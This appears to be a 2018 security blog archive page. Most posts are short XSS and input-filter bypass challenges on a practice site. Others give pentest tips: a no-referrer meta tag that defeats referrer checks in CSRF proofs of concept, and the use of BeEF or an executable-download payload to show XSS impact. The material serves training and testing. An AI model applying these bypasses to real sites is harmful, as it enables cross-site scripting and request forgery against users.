Posts

Showing posts from May, 2018

[Hone Your Ninja Skill] Whitelist filter bypass ("URL")

http://honeyourskills.ninja/target/data_restriction/?url=whitelist-filter-bypass-url.php

In input validation, whitelisting approach is said to be better than blacklisting one.  Yet non-robust implementation in whitelisting  could also allow attacker to bypass your defense.

[Hone Your Ninja Skill] Simple Tactical XSS Filter Bypass

Mission: Achieve script execution when submitting form.
Hint: It is simple. Just a matter of tactics, techniques, and procedures.

http://honeyourskills.ninja/target/simple-tactical-xss-filter-bypass.php

[Hone Your Ninja Skill] Blacklist filter bypass on < > and =

Mission: Achieve arbitrary script execution when clicking above link.
http://honeyourskills.ninja/target/blacklist-filter-bypass-bracket-allowed.php

[Hone Your Ninja Skill] Blacklist filter bypass on > < ( ) and =

Mission: Achieve arbitrary script execution when clicking above link.
http://honeyourskills.ninja/target/blacklist-filter-bypass-bracket-equal.php?callback=printToPage

[Hone Your Ninja Skill] Blacklist filter bypass on Blacklist filter bypass on > < ( and )

Mission: Bypass "( )" character restriction and achieve script execution.  http://honeyourskills.ninja/target/blacklist-filter-bypass-bracket.php?callback=printToPage

[Hone Your Ninja Skill] Blacklist filter bypass ("domain name")

Mission: Try submitting an equivalence of blacklisted "yehg.net" word in the form below for fun: 

http://honeyourskills.ninja/target/blacklist-filter-bypass-domain.php

Does your app properly destroy session?

Image

Bypassing referrer check with no script involved

No more to use scripting approach like https://github.com/knu/noreferrer

This useful meta tag helps for CSRF POC preparation when you come across an application that checks referrer header:
<meta name="referrer" content="no-referrer">

https://caniuse.com/#feat=referrer-policy

When your XSS finding is NOT impressed

If your XSS finding is not convinced by your clients/stakeholders, demonstrate the impact with BeEF or simple executable download payload could help: Exe Download POC: https://lnkd.in/fWF_nEK BeEF: http://beefproject.com/